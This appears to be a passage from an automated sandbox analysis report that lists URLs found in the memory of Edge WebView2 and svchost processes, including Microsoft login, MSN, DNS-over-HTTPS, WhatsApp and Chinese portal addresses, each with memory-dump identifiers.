                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lenovo.ilive.cn
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lenovo.ilive.cn/?f=
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2459855623.00004B18007D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2460936192.00004B18007E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lexical.dev/docs/error?code=$
                  Source: msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lexical.dev/docs/error?code=4
                  Source: msedgewebview2.exe, 00000026.00000003.2457349912.00004B18007BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lexical.dev/docs/error?code=8
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://localhost.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login-us.microsoftonline.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.chinacloudapi.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.cloudgovapi.us/
                  Source: msedgewebview2.exe, 0000001D.00000002.3694100270.00002DDC002B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3666330599.0000021F32A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3666330599.0000021F32A7D000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
                  Source: msedgewebview2.exe, 0000001D.00000002.3666330599.0000021F32A7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comOneDrive=C:
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoft-ppe.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3709381754.00002DDC00FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.de/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.us/
                  Source: msedgewebview2.exe, 0000001D.00000002.3690772226.00002DDC000A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.partner.microsoftonline.cn/er
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.usgovcloudapi.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.windows-ppe.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3653662940.0000021F2D6AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
                  Source: msedgewebview2.exe, 0000001D.00000002.3653662940.0000021F2D6AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
                  Source: msedgewebview2.exe, 0000001D.00000002.3666579423.0000021F32A8E000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3684755587.0000021F358E2000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3664587613.0000021F32A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
                  Source: msedgewebview2.exe, 0000001D.00000002.3692547371.00002DDC001B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lx.pub
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lx.pub/
                  Source: msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapiV
                  Source: msedgewebview2.exe, 00000026.00000003.2426739799.00004B1800AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com
                  Source: msedgewebview2.exe, 00000020.00000002.3643498240.00001B44000A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549634681.00001B440043C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573925253.00001B440044D000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395284363.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2552719085.00001B4400ADC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2551228011.00001B4400120000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570850324.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2550537451.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393955066.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2372950486.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2391697389.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2566710406.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380182324.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2552767669.00001B4400438000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2550584728.00001B440066C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570457618.00001B4400F44000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2569748596.00001B4400ADC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com/maps/api/staticmap
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://microsoftstart.msn.cn/
                  Source: msedgewebview2.exe, 00000024.00000002.2422477300.0000245400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://microsoftstart.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mini.eastday.com/?qid=04433&rfstyle=qt
                  Source: msedgewebview2.exe, 00000026.00000003.2532384549.00004B1801210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mmg.whatsapp.net
                  Source: msedgewebview2.exe, 00000026.00000003.2426548696.00004B1802204000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2513975841.00004B180480E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://modernizr.com/download/?-adownload-cssanimations-csstransitions-exiforientation-serviceworke
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://my.4399.com/yxmsdzls/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.4399.com/aoqi/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.4399.com/aoyazhiguang/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.4399.com/hxjy/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.4399.com/pikatang/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.4399.com/qiu/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.cn/edge/ntp
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2433733969.00002454008BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ntp.www.office.com/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://odvr.nic.cz/doh
                  Source: msedgewebview2.exe, 0000001D.00000002.3693237450.00002DDC0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: svchost.exe, 0000001B.00000003.2282246046.000002A2C3C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2334721555.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2429036422.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692619147.00002DDC001BC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705999244.00002DDC00D60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3700466503.00002DDC00878000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3647710128.00001B4400144000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2436851880.0000245400980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/GetCheckConnectionInfo
                  Source: msedgewebview2.exe, 0000001D.00000002.3697824582.00002DDC00714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/GetCheckConnectionInfo?source=ChromiumBrowser
                  Source: msedgewebview2.exe, 0000001D.00000002.3704763278.00002DDC00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                  Source: msedgewebview2.exe, 0000001D.00000002.3704763278.00002DDC00BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardbui-tes
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ListAccounts?json=standard
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                  Source: msedgewebview2.exe, 0000001D.00000002.3699087294.00002DDC007D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout?source=ChromiumBrowser&continue=https://permanently-remov
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3700963855.00002DDC00900000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                  Source: msedgewebview2.exe, 0000001D.00000002.3696897658.00002DDC006A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                  Source: msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.htmlhttps://permanently-removed.invalid/LogoutYxABs
                  Source: msedgewebview2.exe, 0000001D.00000002.3693669592.00002DDC00254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/devicemanagement/data/api
                  Source: msedgewebview2.exe, 0000001D.00000002.3705999244.00002DDC00D60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ed
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/reauth/chromeos
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/chrome/usermenu
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignin/chromeos
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignup/chromeos
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/v2/chromeos
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/windows
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/xreauth/chrome
                  Source: msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/xreauth/chromehttps://permanently-removed.invalid/embed
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                  Source: msedgewebview2.exe, 00000024.00000002.2436851880.0000245400980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/https://permanently-removed.invalid/http://permanently-removed.i
                  Source: msedgewebview2.exe, 00000024.00000002.2436851880.0000245400980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/https://permanently-removed.invalid/https://permanently-removed.
                  Source: msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                  Source: msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                  Source: msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin-
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                  Source: msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                  Source: msedgewebview2.exe, 0000001D.00000003.2435163541.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2562900302.00002DDC00CBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705489356.00002DDC00CDC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2415876460.0000245400238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/signin/chrome/sync?ssp=1
                  Source: msedgewebview2.exe, 0000001D.00000002.3693954084.00002DDC00298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/events
                  Source: msedgewebview2.exe, 0000001D.00000002.3690058561.00002DDC0001C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                  Source: msedgewebview2.exe, 00000024.00000002.2437244575.00002454009B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetokenhttps://permanently-removed.invalid/reauth/v1beta/u
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1:GetHints
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://public.dns.iij.jp/r
                  Source: msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redian.mnjunshi.com/?qid=tpnews
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redian.mnjunshi.com/?qid=tpnewsy_pcuni
                  Source: msedgewebview2.exe, 00000020.00000002.3658633455.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net
                  Source: msedgewebview2.exe, 0000001D.00000003.2591720737.00002DDC01198000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scontent.whatsapp.net/v/t39.8562-34/311769771_534650495159504_5541131595462341036_n.png?ccb=
